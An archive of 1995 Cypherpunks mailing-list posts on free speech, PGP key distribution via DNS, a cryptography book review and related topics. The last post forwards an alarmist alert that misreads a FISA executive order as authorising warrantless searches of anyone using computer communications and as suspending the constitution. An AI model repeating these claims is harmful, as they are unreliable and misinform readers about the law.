> something or writing it is not bad as long as you didn't have the intent
> or present capability to carry out such.  BTW, I like all of Steven
> Spielberg's writings and movies, and now HB830 from Oregon rears its head
> and fangs.  Did this guy intend to threaten or was it fiction?  How would
> they even know? 
> 
> Next thing you know they will limit all free speech.
> 

They *do* have to prove intent -- as to how, that's what juries are 
for.  BTW, he used her real name in the post, with no disclaimers 
about fiction.  From what I have heard, if he had said the same thing 
in her presence, he could have been arrested for assault.

So is saying something that would be actionable in a public space
also actionable in a public cyberspace?  I dunno, and neither does
anyone else.  But it's a well-established principle that a threat is 
a shout of "Fire!" in a crowded theater.

The "Law" is very conservative.  Not like Newt the Grinch, but like 
the Catholic Church -- make the least change necessary to accomodate 
the pressures.  If you've got laws to cover telephones and cybercomm 
looks like telephones, get out the shoehorn.

"Free" speech has always been a balancing act.  The founders
certainly didn't intend to provide "free" speech for blacks and
women.  Our current case law structure is, in large part, the results
of the ACLU's 80-year struggle to prevent a repetition of the
wholesale imprisonment of dissidents during WWI.  Previously, people
were *commonly* tossed in local hoosegows [sp?] at the whim of the
local authorities for speaking out on anything [Quakers, Methodists,
Baptists, temperance, free love, abolition, suffrage, pacifists, 
Romanists, Masons, anti-masons, anarchists, populists, free silver, 
etc. ad nauseum].

"They" have never liked "free" speech ... :-(

Wei Dai has the right idea -- be a specialist, support other 
specialists.  [But keep those cards and letters coming ... ;-]



===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Network Security Observations <NSO@delphi.com>
Date: Fri, 10 Feb 95 17:02:53 PST
To: cypherpunks@toad.com
Subject: Re: So, what's it all about?
Message-ID: <01HMWAETLTZ29C1MQQ@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


In response to:

> In article <199502100151.RAA25844@sleepy.retix.com>, you wrote:
> > 
> > >   I went to a UNIX trade show yesterday, and the main speaker was a 
> > >   security type. He talked about "the cypherpunks" among other things.
> > >   He said you are really scary and dangerous and ...
> > >   But of course he had to also project this adress (cypherpunks@toad.com)
> > >   on the screen.
> > can't imagine he is much of a security stud if he is that deluded.
> > what was his name?
> Lance or Vance something.  Rottweiler, maybe?

Can anybody tell me who this ignorant twit might be ? 
A correct name and an email address would help to educate him a bit.

Bertil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 10 Feb 95 17:11:41 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: why pgp sucks
In-Reply-To: <199502110029.QAA21514@jobe.shell.portal.com>
Message-ID: <199502110114.UAA07325@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>Matt Blaze <mab@crypto.com> writes:
>>More seriously, the problem that Perry brought up is that it's hard
>>to deploy any kind of scaleable key distribution infrastructure
>>that works with PGP (as it currently exists - and yes, I realize
>>there are work-arounds for some specific situations).
>
>Could you have a distributed database where you lookup by key ID and get
>a key?  Or is there a constraint that the key distribution infrastructure has
>to be part of the DNS?
>
>I could see a set of key servers where one deals with all keys that start
>with 0x00, the next has all keys which start with 0x01, etc.  This makes
>it easy to know which server to go to in order to look up a given key ID.
>
>Hal

Well, you could do that, but it has the disadvantage that you can't
or control what server a particular key would end up on.  One of the
nice things about DNS-like systems is that a domain is responsible for
providing the resources to provide lookups within it.  If I add a machine
to crypto.com, I add it to the crypto.com name server (plus the secondary
servers, but that's a detail that gets handled automatically).
Everyone knows to come here if they want to resolve a crypto.com name.

In the case of PGP key IDs, you could create an artificial hierarchy
of numbers for the purpose of offloading work among several servers,
but that doesn't solve the hard problem, which is letting _me_ (or my
designee) control (and be responsible for) the distribution of keys in
_my_ domain.  (When someone generates a new key it could end up anywhere
in the kind of hierarchy you described).

I don't think it's clear yet, by the way, that domain names are
the right model for personal key distribution (in particular, it
assumes that keys are being distributed on-line and deals only
awkwardly with semi- off-line clients, as anyone who travels with
a sometimes-networked laptop knows.  It also assumes that the
distribution hierarchy can be mapped atop the lookup keys namespace,
which makes it hard to use for anything that isn't hierarchically
formed).  It's probably one of the important options, though, since
it scales so well and has a successfully fielded history in DNS.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 19:10:18 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: why pgp sucks
In-Reply-To: <199502110029.QAA21514@jobe.shell.portal.com>
Message-ID: <9502110307.AA16138@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal says:
> Matt Blaze <mab@crypto.com> writes:
> >More seriously, the problem that Perry brought up is that it's hard
> >to deploy any kind of scaleable key distribution infrastructure
> >that works with PGP (as it currently exists - and yes, I realize
> >there are work-arounds for some specific situations).
> 
> Could you have a distributed database where you lookup by key ID and get
> a key?  Or is there a constraint that the key distribution infrastructure has
> to be part of the DNS?
> 
> I could see a set of key servers where one deals with all keys that start
> with 0x00, the next has all keys which start with 0x01, etc.  This makes
> it easy to know which server to go to in order to look up a given key ID.

Theis will not work, Hal, because it would mean that administrative
control over keys would have to be held by people far removed
organizationally and spacially from those who own them. Things work
much better when the administrators and users are close
together. Futhermore, the DNS style solution scales -- it
automatically aquires servers to meet demand as the space expands,
unlike a pseudo-distributed system such as the one you
propose. Furthermore, DNS is one of the few really large scale
distributed databases that has been well proven, and piggybacking off
the technology has real advantages.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 19:16:52 PST
To: Matt Blaze <mab@crypto.com>
Subject: Re: why pgp sucks
In-Reply-To: <199502110114.UAA07325@crypto.com>
Message-ID: <9502110316.AA29939@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze:
> I don't think it's clear yet, by the way, that domain names are
> the right model for personal key distribution (in particular, it
> assumes that keys are being distributed on-line and deals only
> awkwardly with semi- off-line clients, as anyone who travels with
> a sometimes-networked laptop knows.  It also assumes that the
> distribution hierarchy can be mapped atop the lookup keys namespace,
> which makes it hard to use for anything that isn't hierarchically
> formed).  It's probably one of the important options, though, since
> it scales so well and has a successfully fielded history in DNS.

The idea I've had, and have floated to a few people, is not to
base a distributed keyserver on DNS, but to use DNS as a model
for a distributed key database.  

Hal, yes, you could have a keyID->userID mapping, but that doesn't
scale well.  Let me give you a concrete example (using DNS): I want
the host information for TOXICWASTE.MIT.EDU.  From the root servers I
get to EDU->MIT->TOXICWASTE, and find its IP address (18.85.0.40).
This would be like asking for a key by UserID (warlord@MIT.EDU would
go to the MIT.EDU keyserver).  Now, lets work in reverse, you have
18.85.0.40 and want to get the hostinfo.  In DNS there is a 1-to-1
mapping of Domain to Network.  You _know_ that any machine that is in
18.* will be at MIT, so again you can go to the MIT nameserver for
help.

This doesn't work with PGP KeyID, since the keyID is a random string
of bits.  As a result, you have no way to know that keyID 0xC1B06AF1
should be obtained on the MIT keyserver.  This is the major problem
that Perry is trying to address.  I just don't know of a good way of
doing this, other than maintaining a keyID->userID mapping table
somewhere, but that can become a HUGE flat lookup table!

James said:
> We already have a centralized, for profit, key distribution system.
> 
> http://ww.four11.com/InfoServices.html
> 
> If they make money off it, there will be more of them, they
> will provide better service, and it will in due course
> become a distributed key distribution system.

No offense, James, but this needs to be a free infrastructure.  When
you get your shell account/IP address/PPP drop/etc., you should also
automagically be allocated space in a keyserver.  It shouldn't cost
you anything to be put in it (just like it doesn't cost you anything
to be put in the Telephone White Pages.

The keyservers have to be distributed so that there is a single method
for everyone in the world to connect to the white-page server of their
choice.  I'm sorry, but the WWW is not it.  The WWW does not scale,
and personally if I had to pay to be put on your server, I would
ignore it; I'm perfectly happy using the Public Keyservers.

Just as sites currently provide DNS service for names, they will, in
some time, provide KeyService as well.  It's just a matter of time.

As for the "centralized" part...  I think the distributed part is much
more important.  The public keyserver keyrings are currently over 3MB
and growing.  We need to be able to split that keyring across multiple
servers and have requests go to the appropriate locations.  Yes, there
will be a centralized authority delegator, but the keys themselves, as
well as the means to obtain them, will be distributed.

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 19:21:16 PST
To: perry@imsi.com
Subject: Re: why pgp sucks
In-Reply-To: <9502110307.AA16138@snark.imsi.com>
Message-ID: <9502110321.AA29986@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


The only problem with piggybacking off the current DNS implementation
is that DNS was designed for SMALL pieces of data (read: hostnames and
IP addresses).  PGP keys are HUGE pieces of data, in respect, and DNS
just wont handle the sizes.  For example, my PGP key is about 8k of
data (approximately).  DNS would never be able to handle that!

It its bigger than a single UDP packet DNS has trouble.

No, while DNS is a perfect model for a distributed keyserver,
it is by no means the implementation infrastructure that we want
to use.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 10 Feb 95 21:21:24 PST
To: owner-cypherpunks@toad.com
Subject: Re: MIME based remailing commands
Message-ID: <9502110516.AA15719@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>	It doesn't matter if they disagree. If you don't have a To:
>line in the header then "Apparently-To:" gets tacked on using the "To"
>from the envelope.

... And all CC recipient and all BCC recipients as well.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 10 Feb 95 21:38:27 PST
To: pcassidy@world.std.com
Subject: Re: Bernstein
Message-ID: <9502110534.AA15867@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


djb@silverton wrote a few crypto thinks, including a cute modification
of the snefru hash that turned it into a crypto scheme called shuffle.

my guess is that he put it out on the net for ftp...  but i guess
we'll all find out when the articles gets published.

djb would make a fun addition to this list.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Fri, 10 Feb 95 21:47:10 PST
To: Rich Salz <rsalz@osf.org>
Subject: Re: Bernstein
In-Reply-To: <9502110534.AA15867@sulphur.osf.org>
Message-ID: <Pine.3.89.9502110059.B17884-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


-	I've E-mailed this guy and he has not answered. He may, just by 
some wild twist of fate, have a life and not spend his Friday evenings 
lunging at his terminal every five minutes to check his E-mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Sat, 11 Feb 95 01:39:54 PST
To: dls@mcs.com (David Sallach)
Subject: Re: Laws, Feds, & the Internet
Message-ID: <199502110940.BAA11278@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Sat, 11 Feb 1995 01:41:09 -0600
> To:            cypherpunks@toad.com
> From:          dls@mcs.com (David Sallach)
> >
> >"Free" speech has always been a balancing act.  The founders
> >certainly didn't intend to provide "free" speech for blacks and
> >women.  
> 
>  The Founders created a larger space for free speech than had ever
> existed.  Slaves were deprived of many freedoms including speech, of course,
> but women and free blacks were included in the Bill of Rights and exercised
> free speech, frequently compellingly.  
> 
And were frequently thrown in jail for their pains - note especially 
the experiences of the early feminists [anachronistic label alert].  
And let us not forget what happened to the Mormons ...

> Check out Frederick Douglass' practicing oration while still a
> slave, and then winning his freedom to become one of the greatest
> abolitionist orators.  Consider the appreciation of diversity of thought and
> speech manifested by Jefferson, Lincoln and many other American political
> leaders.
> >

And Douglass spent a good portion of his life as a refugee in a 
protected enclave [Boston] where he had powerful friends to keep him 
from being arrested.

I'm not dissing the Founders, or the Bill of Rights -- just the 
simplified pap their invocation in most discourse has become.  I was 
trained in high school as a scientist, and in college as an 
historian, and in both instances to value the messy contingent 
realities over the tempting simplicities of ideology and theory.

And there are few contingent realities messier than the law ...

> > . . . "They" have never liked "free" speech ... :-(
> 
> Invoking poitically 'correct' stereotypes does not strengthen your
> argument.
> 
> David Sallach

Irony-impaired, are we?

There's a Polish word, used by most of the populace after the 1979
coup to refer to the army and apparat, that is usually translated as
"them."  I [probably incorrectly] recall it as "Oni" -- would you
prefer it?

My own first encounter with the term "politically [in]correct" was
among 70's feminists, who used it ironically, to tell people they
needed a vacation/to get laid/to get a grip.  Would that Newt used it 
that way ...


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dls@mcs.com (David Sallach)
Date: Fri, 10 Feb 95 22:44:16 PST
To: cypherpunks@toad.com
Subject: Re: Laws, Feds, & the Internet
Message-ID: <m0rdBe4-000k50C@mailbox.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>"Free" speech has always been a balancing act.  The founders
>certainly didn't intend to provide "free" speech for blacks and
>women.  

        The Founders created a larger space for free speech than had ever
existed.  Slaves were deprived of many freedoms including speech, of course,
but women and free blacks were included in the Bill of Rights and exercised
free speech, frequently compellingly.  

        Check out Frederick Douglass' practicing oration while still a
slave, and then winning his freedom to become one of the greatest
abolitionist orators.  Consider the appreciation of diversity of thought and
speech manifested by Jefferson, Lincoln and many other American political
leaders.
>
> . . . "They" have never liked "free" speech ... :-(

        Invoking poitically 'correct' stereotypes does not strengthen your
argument.

David Sallach
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8kkMQAAAEEALKOD1O8IVPKHX2qZa+iRz1gqI+uc5lnPAfGYzBSkKDGDdDO
CpZEsblWUkVNdRq/ac5elFFvLAtege+pgWmIFdtPnDtJRhHRjXUjB+aYwzue5+Xb
C+FoT0j5jwl356gdNiOgUxTYx1dDMcA+VotjDNDvsai3AQaJZU6BpjnLW0KBAAUR
tB5EYXZpZCBMLiBTYWxsYWNoIDxkbHNAbWNzLmNvbT4=
=g/d6
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Fri, 10 Feb 95 23:27:57 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: why pgp sucks
Message-ID: <m0rdCF4-000E2cC@dorite.use.com>
MIME-Version: 1.0
Content-Type: text/plain


>"Perry E. Metzger" <perry@imsi.com> writes:
>>I'll also note, yet again, that unless PGP quits this bad practice of
>>identifying counterparties only by a number, it is NOT going to be
>>universally deployed. Counterparties need to be identified by a name
>>that can be looked up in the DNS -- meaning "joe@foo.com" rather than
>>some key ident number.
>
>PGP of course looks up keys by strings in addition to numbers.  A widely
>accepted practice is to use <joe@foo.com> in the user ID which allows the
>lookups to be by internet address.  PGP was intended for use beyond the
>internet, such as in bbs's, fidonet, corporate networks, etc., where DNS
>style addresses may not be useful.
 
I would prefer that PGP would not give out ANY info about addressees.  It 
would seem to me that it is quite a security breach to have PGP dutifully 
tell you to whom it is addressed.  
 
************************************************************
*           Just your basic signature block                *
*                                                          *
*  Al Thompson                                             *
*  Fidonet 1:231/110                                       *
*  alt@iquest.net                                          *
************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Network Security Observations <NSO@delphi.com>
Date: Fri, 10 Feb 95 23:20:30 PST
To: UNINFSEC@CUVMC.BITNET
Subject: new book pre announcement
Message-ID: <01HMWNKSYO6091RZVR@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain



ISM/NSO received the manuscript of 'Cryptography: Theory and Practice'
Author is Doug Stinson (Comp. Science/Eng. dept. University of Nebraska).
Publisher is CRC Press Inc.
Pages: 434
Chapters: 13
Format: Hardbound trimmed book 8,5 x 5,5
ISBN: not available yet
Expected release: within 3 months
Price: not available yet

Preliminary review (a full review will be published in Internet Security
Monthly)

The book starts - obvious - with classical cryptography. Hopping from shift
cipher, to substitution, to affine, to vigenere, to hill, to permutation, and
ending in the range of simple cryptosystems with stream ciphers.  A mature
subchapter is devoted to cryptanalysis, covering the affine, the substitution
and the vigenere. And providing a known plaintext attack on the hill cipher. 
The subchapter ends with the cryptanalysis of the LFSR-based stream cipher.  A 
next chapter discusses in depth Shannon's theory. This is followed by the
inevitable discussion of the DES, its modes of operation and includes an
attack on a 3 round DES, and an attack on a 6 round DES.  Chapter 4 discusses
RSA and factoring. Touching also the not much discussed Chinese Remainder
theorem.. The Rabin scheme is reviewed. And within factoring Doug pays
attention to Dixon's Algorithm and the quadratic sieve.  Of course other
public key cryptosystems, as El Gamal, finite field, Merkle Hellman and
McEliece are discussed.  Doug explains signature schemes, as El Gamal and DSS
and touches undeniable and fail-stop. In Hash functions, after the basics,
among others MD4 and timestamping are issues of interest. In key distribution
and key agreement Blom's scheme, D-H, Kerberos, station to station, MIT key
agreement are noteworthy stops.  Another chapter goes into identification
scheme's discussing Schnorr, Okamoto, Guillou-Quisquater, and a general
overview of conversion processes from identification to signature.   In
authentication codes a good discussion on computing deception probabilities,
and combinatorial bounds. In the latter orthogonal arrays are a topic of
interest. Doug also views the entropy bounds on deception probabilities.  A
next chapter introduces the Shamir treshold, the monotone circuit construction 
and Ernie Brickell's vector space, among others.  A separate chapter is
devoted to pseudo-random numbers, giving examples. The indistinguishable
probability distributions and the Blum/Blum/Shub generator are noteworthy.
Extra attention for probabilistic encryption.  As common fur the subject,
close to the end of the book, zero-knowledge proofs are discussed in depth. 

The book is basically organized in three parts: private key cryptography,
public key cryptography and the introduction to four active research area's.
It's comprehensive in the 'core' area's of cryptography. Although
Cryptography: Theory and Practice is a text book, it certainly provides
researchers and practitioners in the field with material on less discussed
topics, and certainly invites for the development of new idea's.  The work
contains also a comprehensive reference section and the good workable index. 
Each chapter ends with exercise material. 

For the reader:
It is necessary to have at least some familiarity with basic linear algebra
and modular arithmetic. 

Compliments to Doug Stinson who sat many hours behind his terminal to get it
all straightened out, and to a professional publisher that is up to the job of 
putting it all 
in print in such a layout that student, researcher and professional are
encouraged. 

11 February 1995
Internet Security Monthly
Network Security Observations
Editorial Office

------
Note: if you want to copy this short review, distribute it on the net, please 
do so at will. This review is not copyrighted.  If you want more information
on the book, consider sending us an email. 
------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 10 Feb 95 13:44:31 PST
To: cypherpunks@toad.com
Subject: Re: Bernstein
Message-ID: <gate.8DLc1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Peter F Cassidy <pcassidy@world.std.com>:
> -       I am a writer on assignment from the Economist writing about a 
> certain cryptographers' tussle with the State Department, a fellow who is 
> known around the beltway crypto-anarchy, privacy, 
> niceness-on-the-Internet advocacy crowds as Bernstein. I have the outline 

There are two of them in my archives: "D. J. Bernstein" 
(djb@silverton.berkeley.edu) at Berkeley who visited the list once; and E.
Bernstein, the author of papers on quantum complexity along with U Vazirani.

I've never heard of either of them tussling with the State Department. Apart
from the name, though, several cryptographer/cypherpunks could fit the bill, 
from Phil Zimmerman of course to various people who've tried to extract ITAR
clearance or FOIA requests.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Sat, 11 Feb 95 02:49:54 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: West (just a minute)
In-Reply-To: <9502102042.AA20803@toad.com>
Message-ID: <m0rdFOe-0002IhC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Hmm, 
how hard could it be to eliminate West page numbers?

There couldn't be more than a couple of cases on each page, 
if each page number were replaced by links to each case, a
lawyer could tell on the first glance which of the three was
right and mark it, assuming a reasonable HTML/SGML editor or
something.  Seems like it could be done as a part of daily work
and the results accreted somewhere.
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 11 Feb 95 05:31:40 PST
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: why pgp sucks
In-Reply-To: <9502110321.AA29986@toxicwaste.media.mit.edu>
Message-ID: <9502111331.AA16528@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins says:
> The only problem with piggybacking off the current DNS implementation
> is that DNS was designed for SMALL pieces of data (read: hostnames and
> IP addresses).  PGP keys are HUGE pieces of data, in respect, and DNS
> just wont handle the sizes.  For example, my PGP key is about 8k of
> data (approximately).  DNS would never be able to handle that!

Well, its already been modified to do it. Read the drafts by Eastlake
and Kaufman on DNS security, which basically means keys in the DNS and
signed DNS records.

> It its bigger than a single UDP packet DNS has trouble.

So you use TCP -- DNS already supports that. In any case, however, the
reassembly size and lowest common denominator MTUs are being jacked
way up for IPv6.

> No, while DNS is a perfect model for a distributed keyserver,
> it is by no means the implementation infrastructure that we want
> to use.

I very strongly disagree. Even today, we find more and more bugs in
DNS. If we had to start from scratch, we'd have to build an
infrastructure like DNS all over again, only to find that we suffer
from all the same old bugs and end up with a parallel implementation
that looks almost exactly like DNS only less reliable.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 11 Feb 95 05:38:43 PST
To: cypherpunks@toad.com
Subject: Privacy vs. Ubiquitous Video: NetCam; Wearable WebCam, etc
Message-ID: <v01510100ab622813b24d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Saw this in technomads. Not necessarily crypto, but certainly privacy related...

Cheers,
Bob Hettinga


>Date: Fri, 10 Feb 95 19:11:08 -0500
>From: Steve Mann <steve@media.mit.edu>
>To: technomads@ucsd.edu
>Subject: NetCam; Wearable WebCam, etc
>Cc: steve@media.mit.edu
>
>
>I am an amateur television (ATV) hobbyist, interested in things like
>driving radio-controlled cars using a head mounted display (HMD)
>(which involves putting myself into the ``usual'' perspective
>of the car), or playing tennis with an HMD linked to a stand
>mounted camera (which is exactly the opposite: the radiocar is
>like a flight simulator from the cockpit, while the tennis example
>is like switching to the ``control tower'').  I've also been
>interested in wearable photographic equipment (such as a wearable
>2400J flashlamp I use for ``lightpainting'').
>
>More recently, I've become interested in sending and receiving
>video (and digital stills) over the WWW (e.g. Wearable WebCam,
>and WebCar -- radiocar on the WWW).
>
>I would like to hear from any other ATV hobbyists, people into
>packet radio, and those interested in wearable cameras, and
>combining wearable cameras with wearable computing.  Another
>application I was interested in was wearable vision (e.g. for
>the visually impaired, or simply to augment the regular human
>visual system).
>
>Therefore, I've started a new mailing list, ``netcam@media.mit.edu'',
>to discuss issues related to wearable cameras, as well as communications
>and computation issues associated with wearable cameras.  I am also
>interested in some of the privacy issues associated with wearable
>cameras (as I touch on in http://www-white.media.mit.edu/~steve),
>and the social implications of a society in which there are
>ubiquitous cameras (both wearable and fixed) connected to various
>high speed communications networks.
>
>If you would like to be added to netcam@media.mit.edu, please
>email netcam-request@media.mit.edu
>
>--steve

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 11 Feb 95 09:10:27 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <m0rdCF4-000E2cC@dorite.use.com>
Message-ID: <199502111709.JAA19315@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


alt@iquest.net (Al Thompson) writes:
>I would prefer that PGP would not give out ANY info about addressees.  It 
>would seem to me that it is quite a security breach to have PGP dutifully 
>tell you to whom it is addressed.  

PGP could be hacked fairly easily to do this (in fact there is a
program around called stealth that does this to some extent), however
in the context of this discussion we were discussing more the issue of
checking the signature on a file.  For that we do need a hint about
whose signature purports to be there.  PGP presently provides this in
the form of the low-order 64 bits of the key modulus, and this provides
problems in implementing the key database in distributed form.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 11 Feb 95 06:36:15 PST
To: cypherpunks@toad.com
Subject: NYT on Cybertheft and Sex Writer
Message-ID: <199502111435.JAA26507@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Ralph Blumenthal writes on NYC conference on "cyberthieves" of 
ideas and intellectual property.


For email copy send blank message to <jya@pipeline.com> with 
subject:  TEF_ida


Peter Lewis writes on the U Mich student arrested for posting 
fictional rough sex story.


For email copy, same, with subject:  RIT_xxx



----------

Also, for the famished, these not very fresh tomatoes:


Negroponte writes OpEd piece supporting Newt's idea for a 
laptop in every cave, arguing that it will help with 
international economic competition, especially against those 
countries with the youngest population.  NEG_poo


Peter Lewis writes on PSI's buy of Pipeline.  PSI_pip




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Sat, 11 Feb 95 07:41:00 PST
To: cypherpunks@toad.com
Subject: Four Horsemen of the Infopocalypse?
Message-ID: <199502111540.KAA05206@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



Terrorists, Drug Dealers, Pornography and Piracy (copyright, patent & trademarks)
					  ^^^^^^
That's been left out... and likely it's the one some of the authorities
fear most. Money can be made off of terrorists, drug dealers and pornograpy
by allowing them to exist as a "threat" rather than actually stopping them.

Piracy is a whole different matter (though some would argue that it applies
to allow it as well...)

Off the subject of crypto, though....


Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 11 Feb 95 08:05:24 PST
To: cypherpunks@toad.com
Subject: Forwarded mail....
Message-ID: <Pine.SOL.3.90.950211105504.18090A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Linda does a good job but I frankly didn't believe this when I got it.
So I checked.  Unfortunately, this is true.

Herr Klinton has, by executive order, suspended part of the constitution 
which gives him his powers.  This is not logical, but if he has 
enough guys with guns backing him up, that doesn't matter.

Good luck to you all.  I may occasionally read my mail but from now
on my efforts are going to be focused on getting moved out of this 
hellhole before they "seal the borders." (another project of 
Janet Reno's)

Regards,
Brad Dolan

---------- Forwarded message ----------
Date: Sat, 11 Feb 95 05:06 EST
From: lindat@iquest.net
To: caji@aol.com

Please excuse any duplication to you.  I have not finished sorting out my
lists and only recently figured out the difference between individuals and
newsgroups (and have not yet gotten the names that are already in
newsgroups).  This was too important to wait on me to finish sorting.

***********************  ALERT   ALERT  ************************

WARRENTLESS SEARCHES CAN NOW BE APPROVED BY FREEH, RENO, DOD, ET.
AL. AND CONDUCTED BY ANY FED AGENCY.  DUE TO THE CRIME BILL, THE FED
AGENCIES ARE NOW ALL OPERATING IN CONSOLIDATED "TASK FORCES."

   THIS EXECUTIVE ORDER ***SPECIFICALLY*** APPLIES TO ANYONE USING
            COMPUTER COMMUNICATIONS TO GATHER INFORMATION
              (SEE THE UNDERLYING LAW AT 50 USC 1801.)
              IT MAY ALSO BE USED TO APPLY TO MILITIAS BY THE
              AMBIGUOUS WORDING IN 50 USC 1801 and PL 103-359



                            THE WHITE HOUSE
                     Office of the Press Secretary
___________________________________________________________________
For Immediate Release                              February 9, 1995


                           EXECUTIVE ORDER

                            - - - - - - -
               FOREIGN INTELLIGENCE PHYSICAL SEARCHES


       By the authority vested in me as President by the
Constitution and the laws of the United States, including sections
302 and 303 of the Foreign Intelligence Surveillance Act of 1978
("Act") (50 U.S.C. 1801, et seq.), as amended by Public Law 103-
359, and in order to provide for the authorization of physical
searches for foreign intelligence purposes as set forth in the Act,
it is hereby ordered as follows:

       Section 1.  Pursuant to section 302(a)(1) of the Act, the
Attorney General is authorized to approve physical searches, without
a court order, to acquire foreign intelligence information for
periods of up to one year, if the Attorney General makes the
certifications required by that section.

       Sec. 2.  Pursuant to section 302(b) of the Act, the Attorney
General is authorized to approve applications to the Foreign
Intelligence Surveillance Court under section 303 of the Act to
obtain orders for physical searches for the purpose of collecting
foreign intelligence information.

       Sec. 3.  Pursuant to section 303(a)(7) of the Act, the
following officials, each of whom is employed in the area of
national security or defense, is designated to make the
certifications required by section 303(a)(7) of the Act in support
of applications to conduct physical searches:

       (a) Secretary of State;

       (b) Secretary of Defense;

       (c) Director of Central Intelligence;

       (d) Director of the Federal Bureau of
           Investigation;

       (e) Deputy Secretary of State;

       (f) Deputy Secretary of Defense; and

       (g) Deputy Director of Central Intelligence.

       None of the above officials, nor anyone officially acting in
that capacity, may exercise the authority to make the above
certifications, unless that official has been appointed by the
President, by and with the advice and consent of the Senate.


                         WILLIAM J. CLINTON


  THE WHITE HOUSE,
      February 9, 1995.


******************************************************************************
*  Dr. Linda D. Thompson                  NO JUSTICE, NO PEACE.            *
*  American Justice Federation
*
*  3850 S. Emerson Avenue, Suite E,  Indianapolis, IN 46203             * 
*  Telephone: (317) 780-5203      AEN News BBS: (317) 780-5211      *
